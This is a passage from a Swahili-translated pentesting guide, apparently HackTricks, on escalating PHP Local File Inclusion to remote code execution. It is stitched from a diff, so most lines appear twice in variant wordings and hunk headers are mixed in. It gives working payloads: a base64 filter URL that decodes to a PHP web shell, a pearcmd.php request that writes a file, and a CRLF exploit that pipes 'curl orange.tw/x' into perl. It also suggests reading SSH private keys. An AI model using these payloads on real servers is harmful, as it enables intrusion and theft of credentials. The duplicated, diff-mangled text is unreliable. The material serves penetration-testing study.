Ikiwa ssh iko active, angalia ni user gani anatumika (/proc/self/status & /etc/passwd) na jaribu kufikia **\<HOME>/.ssh/id_rsa**
### **Kupitia** **vsftpd** _**logs**_
### **Kupitia** **vsftpd** _**rejista**_
Logi za server ya FTP vsftpd ziko katika _**/var/log/vsftpd.log**_. Katika tukio ambapo kuna udhaifu wa Local File Inclusion (LFI), na ufikiaji wa server ya vsftpd iliyofichuliwa unapatikana, hatua zifuatazo zinaweza kuzingatiwa:
Rejista za FTP server vsftpd zipo katika _**/var/log/vsftpd.log**_. Katika hali ambapo Local File Inclusion (LFI) vulnerability ipo, na upatikanaji wa server ya vsftpd iliyo wazi unawezawezekana, hatua zifuatazo zinaweza kuzingatiwa:
1. Inject PHP payload kwenye uwanja wa username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata logi za server kutoka _**/var/log/vsftpd.log**_.
1. Injiza payload ya PHP kwenye uwanja wa username wakati wa mchakato wa login.
2. Baada ya injection, tumia LFI kupata rejista za server kutoka _**/var/log/vsftpd.log**_.
### Kupitia php base64 filter (using base64)
### Kupitia php base64 filter (kutumia base64)
Kama inavyoonyeshwa katika [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) article, PHP base64 filter huvipuuza vitu visivyo-base64. Unaweza kutumia hilo kupita ukaguzi wa file extension: ikiwa utatoa base64 inayomalizika na ".php", itapuuza "." na kuongeza "php" kwenye base64. Hapa kuna mfano wa payload:
Kama inavyoonyeshwa katika [this](https://matan-h.com/one-lfi-bypass-to-rule-them-all-using-base64) makala, PHP base64 filter huwapuuza wahusika wasiokuwa base64. Unaweza kutumia hilo kupita ukaguzi wa extension ya faili: ukitoa base64 inayomalizika na ".php", itapuuza "." na kuongeza "php" kwenye base64. Hapa kuna payload ya mfano:
```url
http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php
NOTE: the payload is "<?php system($_GET['cmd']);echo 'Shell done !'; ?>"
```
### Via php filters (hakuna faili inahitajika)
### Kupitia php filters (hakuna faili inahitajika)
This [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) explains that you can use **php filters to generate arbitrary content** as output. Which basically means that you can **generate arbitrary php code** for the include **without needing to write** it into a file.
Hii [**writeup** ](https://gist.github.com/loknop/b27422d355ea1fd0d90d6dbc1e278d4d) inaeleza kwamba unaweza kutumia **php filters to generate arbitrary content** kama matokeo. Ambayo kwa msingi inamaanisha kwamba unaweza **generate arbitrary php code** kwa include **without needing to write** it into a file.
{{#ref}}
lfi2rce-via-php-filters.md
{{#endref}}
### Via segmentation fault
### Kupitia segmentation fault
**Pakia** faili itakayohifadhiwa kama **temporary** katika `/tmp`, kisha katika **request moja hiyo,** chochea **segmentation fault**, na basi **faili ya muda haitaondolewa** na unaweza kuitafuta.
Pakia faili itakayohifadhiwa kama ya muda katika /tmp, kisha katika request ileile, chochea segmentation fault, na basi faili ya muda haitafutwa na unaweza kuitafuta.
{{#ref}}
lfi2rce-via-segmentation-fault.md
{{#endref}}
### Via Nginx temp file storage
### Kupitia Nginx temp file storage
Ikiwa umepata Local File Inclusion na Nginx inaendesha mbele ya PHP unaweza kuweza kupata RCE kwa mbinu ifuatayo:
Ikiwa umepata **Local File Inclusion** na **Nginx** inaendesha mbele ya PHP unaweza kupata RCE kwa mbinu ifuatayo:
{{#ref}}
lfi2rce-via-nginx-temp-files.md
{{#endref}}
### Via PHP_SESSION_UPLOAD_PROGRESS
### Kupitia PHP_SESSION_UPLOAD_PROGRESS
Ikiwa umepata Local File Inclusion hata kama huna session na `session.auto_start` iko `Off`. Ikiwa utatoa `PHP_SESSION_UPLOAD_PROGRESS` katika multipart POST data, PHP itawasha session kwa ajili yako. Unaweza kutumia vibaya hii kupata RCE:
Kama umepata **Local File Inclusion** hata kama **huna session** na `session.auto_start` iko `Off`. Ikiwa utatoa **`PHP_SESSION_UPLOAD_PROGRESS`** katika data ya **multipart POST**, PHP itafungua/itawezisha session kwako. Unaweza kutumia hili kupata RCE:
{{#ref}}
via-php_session_upload_progress.md
{{#endref}}
### Via temp file uploads in Windows
### Kupitia temp file uploads katika Windows
Ikiwa umepata Local File Inclusion na server inaendesha kwenye Windows unaweza kupata RCE:
Ikiwa umepata **Local File Inclusion** na server inaendesha kwenye **Windows** unaweza kupata RCE:
{{#ref}}
lfi2rce-via-temp-file-uploads.md
{{#endref}}
### Via `pearcmd.php` + URL args
### Kupitia `pearcmd.php` + URL args
As [**explained in this post**](https://www.leavesongs.com/PENETRATION/docker-php-include-getshell.html#0x06-pearcmdphp), the script `/usr/local/lib/phppearcmd.php` exists by default in php docker images. Moreover, it's possible to pass arguments to the script via the URL because it's indicated that if a URL param doesn't have an `=`, it should be used as an argument. See also [watchTowrs write-up](https://labs.watchtowr.com/form-tools-we-need-to-talk-about-php/) and [Orange Tsais “Confusion Attacks”](https://blog.orange.tw/posts/2024-08-confusion-attacks-en/).
@ -620,7 +621,7 @@ The following request create a file in `/tmp/hello.php` with the content `<?=php
```bash
GET /index.php?+config-create+/&file=/usr/local/lib/php/pearcmd.php&/<?=phpinfo()?>+/tmp/hello.php HTTP/1.1
```
Ifuatayo inatumia CRLF vuln kupata RCE (kutoka [**here**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)):
Ifuatayo inatumia CRLF vuln ili kupata RCE (kutoka [**here**](https://blog.orange.tw/2024/08/confusion-attacks-en.html?m=1)):
```
http://server/cgi-bin/redir.cgi?r=http:// %0d%0a
Location:/ooo? %2b run-tests %2b -ui %2b $(curl${IFS}orange.tw/x|perl) %2b alltests.php %0d%0a
@ -629,7 +630,7 @@ Content-Type:proxy:unix:/run/php/php-fpm.sock|fcgi://127.0.0.1/usr/local/lib/php
```
### Kupitia phpinfo() (file_uploads = on)
Ikiwa umegundua **Local File Inclusion** na faili inayofichua **phpinfo()** yenye file_uploads = on unaweza kupata RCE:
Ikiwa umepata **Local File Inclusion** na faili inayofichua **phpinfo()** na file_uploads = on, unaweza kupata RCE:
{{#ref}}
@ -638,7 +639,7 @@ lfi2rce-via-phpinfo.md
### Kupitia compress.zlib + `PHP_STREAM_PREFER_STUDIO` + Path Disclosure
Ikiwa umegundua **Local File Inclusion** na unaweza **exfiltrate the path** ya faili ya muda LAKINI **server** inakagua kama **faili itakayojumuishwa ina PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia **Race Condition**:
Ikiwa umepata **Local File Inclusion** na unaweza **exfiltrate the path** ya temp file, LAKINI **server** inafanya **checking** ikiwa **file to be included has PHP marks**, unaweza kujaribu **bypass that check** kwa kutumia **Race Condition**:
{{#ref}}
@ -647,7 +648,7 @@ lfi2rce-via-compress.zlib-+-php_stream_prefer_studio-+-path-disclosure.md
### Kupitia eternal waiting + bruteforce
Ikiwa unaweza kutumia LFI kuabuse ili **upload temporary files** na kufanya server **hang** utekelezaji wa PHP, basi unaweza kisha **brute force filenames kwa masaa** ili kupata faili ya muda:
Ikiwa unaweza kutumia LFI ili **upload temporary files** na kuifanya server **hang** utekelezaji wa PHP, unaweza kisha **brute force filenames during hours** ili kupata temporary file:
{{#ref}}
@ -656,13 +657,14 @@ lfi2rce-via-eternal-waiting.md
### Kwa Fatal Error
Ikiwa unajumuisha yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha error hiyo).
Ikiwa una-include yoyote ya faili `/usr/bin/phar`, `/usr/bin/phar7`, `/usr/bin/phar.phar7`, `/usr/bin/phar.phar`. (Unahitaji kujumuisha ile ile mara 2 ili kusababisha error hiyo).
**Sijui jinsi hili linavyoweza kuwa na manufaa lakini linaweza kuwa.**\
_Hata kama unasababisha PHP Fatal Error, PHP temporary files uploaded zinafutwa._
**Sijui jinsi hii inavyoweza kuwa muhimu, lakini inaweza kuwa.**\
_Hata kama unasababisha PHP Fatal Error, PHP temporary files zilizouppload zinafutwa._
<figure><img src="../../images/image (1031).png" alt=""><figcaption></figcaption></figure>
## Marejeo
- [PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20Inclusion%20-%20Path%20Traversal)